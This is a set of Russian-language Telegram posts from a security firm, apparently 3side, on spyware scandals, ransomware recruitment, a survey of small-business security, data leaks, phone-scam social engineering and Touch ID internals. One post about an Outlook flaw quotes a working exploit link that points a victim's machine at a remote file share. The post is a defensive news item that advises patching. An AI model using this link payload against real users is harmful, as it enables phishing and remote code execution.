Ой, а кто это сделал?!

Тут в Иордании очередной скандал, связанный с шпионским ПО от израильтян из NSO Group. Pegus использовали для слежки за оппозиционными активистами. Как говорится, никогда не было, и вот опять.

"Внезапно" выяснилось, что рано или поздно практически любая страна начинает использовать шпионский софт не только для борьбы с наркоторговцами и разными экстремистами, но и для слежки за политическими оппонентами правящей партии. Причем не важно, идет речь об Иордании или Мексике, или о демократической Польше. Разве что в ЕС скандал будет погромче.

Оказывается, если продавать кибероружие, то его могут использовать не по назначению. Ну, или очень даже по назначению.

Хочется добавить голосом Галустяна из Нашей Раши: "Ой, а кто это сделал?" И правда, очень неожиданно. Ничего же не предвещало.

3side медиа-партнер форума «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ»

Разместили анонс и приглашаем поучаствовать!
От нас на Форуме будет Антон Бочкарев в качестве слушателя, смело подходите на нетворк.

❕4 апреля 2024 г. в Москве состоится Форум «ТЕРРИТОРИЯ БЕЗОПАСНОСТИ – 2024: все pro ИБ».

🗣 Спикеры КОНФЕРЕНЦИЙ 2024 ГОДА:
🔸 PRO расследования инцидентов: https://www.comnews-conferences.ru/tb2024/ri
🔹 PRO обнаружение угроз: https://www.comnews-conferences.ru/tb2024/ou
🔸 PRO управление уязвимостями: https://www.comnews-conferences.ru/tb2024/uu
🔹 PRO безопасную разработку: https://www.comnews-conferences.ru/tb2024/br

📍 HYATT REGENCY MOSCOW PETROVSKY PARK
💁‍♂️ Регистрация: https://www.comnews-conferences.ru/tb2024/registration
❗️Участие для руководителей ИБ-департаментов БЕСПЛАТНОЕ!
❗️ При оплате до 1 марта 2024 г. действует льготная стоимость участия для делегатов-слушателей!
✉️ Выступить с докладом на конференциях или стать экспонентном: conf@comnews.ru

Меняются технологии, люди остаются

Небольшой развлекательно-исторический лонг о том, как "ловили" первых хакеров и как ломали американскую оборонку. Спойлер: изменилось не так много, как может показаться.

https://telegra.ph/KGB-hakery-The-Illuminatus-02-12

В продолжение недавнего видеоинтервью для Garantex

Очень детальная и подробная подборка устройств с описанием их функций и преимуществ/недостатков. От себя повторим, что параллельный импорт-игрушка дьявола, и относиться к нему стоит очень — очень осторожно. А полную версию интервью можно посмотреть здесь.

Публичный эксплойт на критическую уязвимость Microsoft Outlook

Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!

Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.

Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.

Добро пожаловать на рынок кибербезопасности, Александр!

Если без иронии, то этот пост чуть более чем описывает состояние рынка услуг ИБ в России. Вы или ищете друга, у которого есть друг, и рассчитываете на порядочность всех участников цепочки, или платите "сантехнику" за 100500 рублей в час. Ну, или покупаете стартап по прочистке труб/нанимаете команду.

Сервисы (вроде 3side, но не только) не просто делают жизнь проще. Они исправляют ассиметрию информации и превращают "восточный базар" в эффективный рынок, на котором жить становится проще примерно всем.

Как российские кибервымогатели вербуют специалистов под видом легального бизнеса

Самое "прекрасное" в недавней истории про SugarLocker — не в том, как вымогатели работали, а в том, как они вербовали людей. А делали они это под видом вполне легальной компании с прекрасным названием Shtazi-IT. То есть еще раз, киберкриминал вполне официально мог давать объявление на условном HH. Кстати, история в России далеко не самая редкая, мы сами натыкались на "странные" вакансии.

К слову, в США тоже были похожие истории. Например, в 21 году там участник хакерской группировки FIN7 получил семь лет тюрьмы. На суде его адвокат заявлял, что в группировку тот попал случайно — после того, как откликнулся на объявление о вакансии в ИБ-компании Combi Security.

Мы это к чему. Вербовка ИБ-специалистов в рансом на вполне легальных площадках — это вполне себе современная действительность.

Статья на Хакере

По мотивам моего выступления на Highload написал статью в легендарный журнал Хакер. Статья для целевой аудитории журнала, стиль подбирал под нее же, добавил хакерскую специфику не типичную для этого канала.

Для меня это важное достижение, ведь еще подростком я читал журнал запоем и старался не пропускать каждый выпуск! Часть статей понять было сложно, а уж о том, чтобы написать туда и даже не мечтал. Когда я пришел в профессию, точно понял, что рано или поздно что-то туда напишу и внесу свой вклад. Но нужна была особенная достойная тема, наконец я ее нашел!

Журнал доступен по подписке, но насколько я знаю, через 2 месяца статья будет целиком доступна бесплатно!
https://xakep.ru/2024/02/21/mind-exploits/

Атаки не ради денег — мотивация киберпреступников изменилась?

Тут FACCT (ex Group-IB) выкатили любопытный отчет, в котором кроме прочего написана одна вещь, про которую мы очень давно говорили. Кибератаки теряют финансовую мотивацию, а вместе с профессиональными киберпреступниками (на любом этапе цепочки RAAS) начинают действовать хактивисты с разным уровнем подготовки.

Еще раз: большинство работающих по RU преступников делают это не для того, чтобы зашифровать, потом получить выкуп и заработать пару (десятков) миллионов долларов. В реальности, большинство из них делают это ради нанесения максимального ущерба. Все это приводит к тому, что размер целевых компаний существенно снижается: теперь не нужно атаковать только платежеспособных, а под угрозой оказывается практически любой средний и даже малый бизнес.

При этом, традиционные стратегии противодействия работают, и никакой серебряной пули тут нет. Чтобы заниматься быть защищенным, надо заниматься ИБ, инвестировать деньги (покупая продукты, услуги и нанимая компетентных профессионалов) и время. Причем в случае с небольшими компаниями это, очевидно, будет бремя менеджмента. Но другого пути нет.

А еще отчет подтвердил, что фишинг и социальная инженерия продолжают оставаться ключевой точкой "входа" в инфраструктуру компании — но это все и так знают.

Первое публичное исследование кибербезопасности МСП

Наконец-то — совместно с АСИ мы выпустили первое в России исследование защищенности компаний малого и среднего предпринимательства (МСП). Ранее никто публично не исследовал и не писал об этом, ведь все привыкли, что безопасность это для крупного бизнеса - энтерпрайза. Мы с этим совершенно не согласны.
Сам файл во вложении, методология внутри, многое можно обсуждать, а пока самое главное:

— МСП начали действительно часто ломать (45% атакованы, 15% понесли значимый ущерб), и это общемировой тренд
— Информирование важно: МСП хотят понять как работает ИБ
— На ИБ начинают тратить после уже произошедших инцидентов
— Более крупные МСП боятся за системы автоматизации (АСУТП и CRM), малые — за сайт

И еще куча всего про угрозы, расходы, самооценку и прочее. Мы разберем самое интересное в отдельных постах.

Управление секретами в компании, это крайне важно. Именно с ними зачастую наибольший беспорядок в молодых, но активно развивающихся компаниях!

Отлично, что опенсорс проекты в этом направлении тоже не менее активно развиваются.

Фишинг «фичи» Телеграма

Попытался добиться исправления пары небезопасных, с точки зрения социальной инженерии, функций. Пробовал через BugBounty - единую почту "security".
Теперь попробую привлечь внимание к проблеме через Habr!

Понятно, что это явно не в скоупе BugBounty, но цель поста - исправление, благо оно тут очень простое.

Утекла очередная база данных — на этот раз МФО

Судя по сообщениям в ТГ (раз, два) в доступе оказалась часть базы клиентов МФО "Займер". Всего предположительно утекли данные о 16 млн россиян / 14 млн уникальных телефонов. А потом так что не одними данными доставщиков и ковидных тестировщиков полнятся базы мошеннических колл-центров))

По ощущениям, масштаб утечек в 2024 году будет как минимум сопоставим с 2023. Возможно, крупные компании, банки и разного рода энтерпрайзы будут "течь" меньше, но вообще говоря операторов персональных данных в России не много, а очень-очень много. Так сказать, хватит на долгие годы утечек.

Но если это правда, и клиентами только одно, пусть и довольно крупного МФО, были 10+ млн человек — то у нас не очень хорошие новости о доступности банковских продуктов в РФ. Даже 10 млн россиян — это 13% экономически активного населения страны. Но вот это уже за пределами тематики канала.

Какой ущерб МСП несут от кибератак?

Мы начинаем публиковать некоторые результаты нашего исследования. И сегодня поговорим о самом простом и важном — ущербе от кибератак.

Первое и главное — 45% опрошенных компаний столкнулись с ИБ-инцидентами. В большинстве случаев, ущерб был несущественным или вовсе отсутствовал. Но не всегда.

Около трети атакованных МСП (и "малых", и "крупных") понесли значимый ущерб. "Критический" ущерб понесли считанные проценты, но тут возможна классическая "ошибка выжившего".

В общем, фокус на защиту МСП имеет смысл — там все достаточно плохо.

"Умеренный" ущерб — это много или мало?

В продолжение к предыдущему посту. Мы просили респондентов измерить ущерб по отношению к годовому обороту компании. Среди ответивших (а их было меньше, чем сообщивших о реализовавшемся ущербе) картина сложилась такая — 10% МСП понесли ущерб в 20 и более процентов от оборота. Это очень много.

На другом полюсе, 44% атакованных вовсе без ущерба — мы предполагаем, что тут атаки на сайты и прочие репутационные истории небольших компаний.

И в продолжение про крипту и мошенников — из нашего видео с Garantex

По большому счету, почти все представленные советы универсальны и работают для всех отраслей.

Колл-центры атакуют выборы: как работает социальная инженерия

Мошеннические колл-центры эффективно используют свои навыки для кражи денег, проведения диверсий и на выборах. Способов обмана много, а результат один.

Где-то манипуляциями, где-то прямым шантажом уже потерянными миллионами, они заставляют своих жертв идти на преступление!
Поджигать, выливать краску в урны для голосования и многое другое.

Причем, вопреки устоявшемуся заблуждению под манипуляцию может угодить любой, абсолютно адекватный человек любого возраста. Ведь используются наши общие особенности и уязвимости мышления. В момент звонка в удачном для мошенников состоянии может оказаться кто угодно .

Например, доктора наук УРФУ развели на 15 млн рублей и заставляли вылить зеленку в урну, испортив бюллетени. Попытка вышла не то чтобы удачная, но с потенциальным наказанием от 3 до 5 лет.

Мы уже неоднократно писали, что лучший вариант сразу «бросать трубку», по одноименной памятке.

И следите за своими близкими, если они начинают вести странный диалог по телефону или делать какие-то действия, возможно их придется останавливать силой, это эффективнее, чем переубеждать. Деньги никто не вернет, а уголовную ответственность для жертв манипуляции никто не отменял.

FAQ о канале

Уважаемые подписчики, вас стало уже достаточно много, и большинство из вас не застали становление нашего канала.
Поэтому у многих возникают закономерные вопросы:

- Что это за канал?
Это корпоративный канал компании по кибербезопасности 3side ("Третья Сторона") . Мы не новостной канал, не авторский, и уж совсем не анонимный!

- Что вы постите?
Мы постим то, что касается кибербезопасности. Иногда это новости, из мира кибербеза, которые мы посчитали действительно важными. Иногда это анонсы наших выступлений/мероприятий, посты о наших нововведениях на нашей площадке или пиар наших услуг.

- Размещаете рекламу?
Нет, мы не размещаем коммерческую рекламу, Мы не зарабатываем на канале. Мы можем разместить анонсы мероприятий наших партнеров, в которых мы сами планируем принять участие, или готовы порекомендовать подписчикам. Но это бесплатно в рамках статуса "медиапартнера".

- Как часто выходят посты?
Раз в 2-3 дня, если не появляется что-то действительно "горячее" и важное. Если коротко, наша контентная политика звучит как "не спамим". Ведь сейчас Интернет и Телеграм в частности перегружают пользователей информацией, зачастую малополезной. Поэтому мы постим редко и то, что считаем важным.

- Телефонные мошенники, почему вы часто об этом пишете?
Начиная с первой диверсии в августе 2022 года мы осознанно подсвечиваем эту тему. Во-первых потому, что считаем ее крайне важной, а это явление очень опасным для населения. Во-вторых, мы первые кто начал ее подсвечивать, и писать о роли социальной инженерии. Нашими усилиями об этом начали писать СМИ, сначала не разбираясь в вопросе. Но многие исправляли свои статьи после наших писем и комментариев, к сожалению, далеко не все. Мы осознанно боремся со многими заблуждениями,и пытаемся максимально широко охватить аудиторию. И у нас это получается. Именно посты о колл-центрах у нас набирают сотни тысяч просмотров! Мы считаем это нашей социальной миссией.

- Вы пишете о политических хактивистах и политике около кибербеза?
Нет, наши обзоры чего-либо связанного с подобным пишутся лишь в технической плоскости. И снабжаются тегом #3side_безполитики.

- Почему закрыты комментарии?
Мы корпоративный канал молодой компании, у нас, к сожалению, нет времени и желания модерировать комментарии. А это неизбежно придётся делать, поэтому пока комментарии будут закрыты. Но, возможно, мы их откроем в будущем!

- Можно вам написать, или задать вопрос?
Да конечно, контакт в описании канала. Нам даже можно предложить темы для постов, у нас даже есть уже подзабытая для этого рубрика "Так безопасно?".

Погружение в технику. О безопасности Touch ID. Часть I

Одна из первых современных биометрических систем на смартфонах была Touch ID. Её представили в 2013 году вместе с выходом iPhone 5S и тогда её внедрение сильно упростило доступ к устройству. Давайте поговорим о том, как устроен Touch ID и так ли безопасно использовать его в качестве защиты своего мобильного девайса?

Из чего состоит человеческий палец? Из нескольких фаланг, из которых нас интересует самая крайняя, а именно дистальная фаланга или же по-простому — кончик пальца. С внутренней его стороны находится подушечка, которая образует уникальный рисунок из концентрических борозд. Несмотря на уникальность рисунка, у каких-то людей он действительно может повторяться, но шанс этого повторения крайне мал. В статье Apple о безопасности Touch ID указывается, что вероятность совпадения даже мельчайших областей разных отпечатков составляет всего 1:50 000 для одного сохраненного отпечатка.

Для технологии по считыванию биометрии и используется этот самый уникальный рисунок, который называется папиллярным рисунком. Как это происходит? Начнём с устройства самого сканера. Основным элементом здесь является центральная часть, где и находится сенсор. Она выполнена из кристалла сапфира, который обеспечивает высокую изностойкость и выступает в роли линзы, фокусирующейся на пальце. Следом идёт стальное кольцо, которое визуально разграничивает кнопку и корпус устройства. Оно является датчиком, который обнаруживает палец и выдаёт сигнал главному сенсору на начало сканирования. Если вы сразу приложите палец к сенсору, не коснувшись кольца, считывания биометрии происходить не будет.

Разобравшись с устройством, перейдём к его работе. Начнём с самого базового момента — регистрации отпечатка. Когда вы только начинаете настраивать ваш гаджет с Touch ID, вам предлагается зарегистрировать отпечаток пальца. Вы многократно прикладывайте подушечку пальца к сканеру, в результате чего в память устройства раз за разом записывается изображение отпечатка пальца вплоть до самых мелких деталей. Они подразделяются на 3 категории — дуга, петли и завиток. И все вместе образуют общий рисунок человеческого пальца, на который к тому же накладываются детали гребешков.

После создания детального изображения оно преобразуется в математическое представление, путь которого пролегает прямо в память устройства… ну почти. Так как биометрия пользователей, наравне с их код-паролями и данными банковских карт, является для Apple священной коровой, то и оберегают их по-особенному. А именно — с помощью Secure Enclave и защищенного энергонезависимого хранилища.

Secure Enclave является отдельными чипом внутри процессоров Apple, который отвечает за шифрование конфиденциальных данных пользователя. Если вкратце — после поступления математического образа вашей биометрии в зашифрованном виде он пропускает эту информацию через ещё два уровня шифрования и записывает её в защищенное хранилище. Оно не является частью Secure Enclave, но связано только с ним и ни с чем более.

Теперь в защищенном хранилище есть образ вашего отпечатка в виде зашифрованного кода. Изображение подушечки, которое сканер получает на входе, удаляется сразу после преобразования его в математическое представление.

Используя информацию в защищенном хранилище как шаблон, устройство может проводить аутентификацию входящих отпечатков пальца. Как это происходит? Вам нужно разблокировать смартфон, а значит, нужно приложить палец к сканеру. Проводится сканирование и математическое представление отсылается в Secure Enclave. В свою очередь, анклав проводит сверку полученного отпечатка с шаблоном из защищенного хранилища, и если совпадения обнаружены, то телефон разблокируется. А полученные данные помогут немного уточнить шаблон. Их, к слову, может быть несколько, как и пальцев на вашей руке (да, в настройках телефона есть возможность добавить несколько пальцев).

Разобравшись с устройством Touch ID мы перейдём к способам взлома этой системы. Об этом написано во второй части.

Источник материала — статья на хабре, предложена в канал самим автором.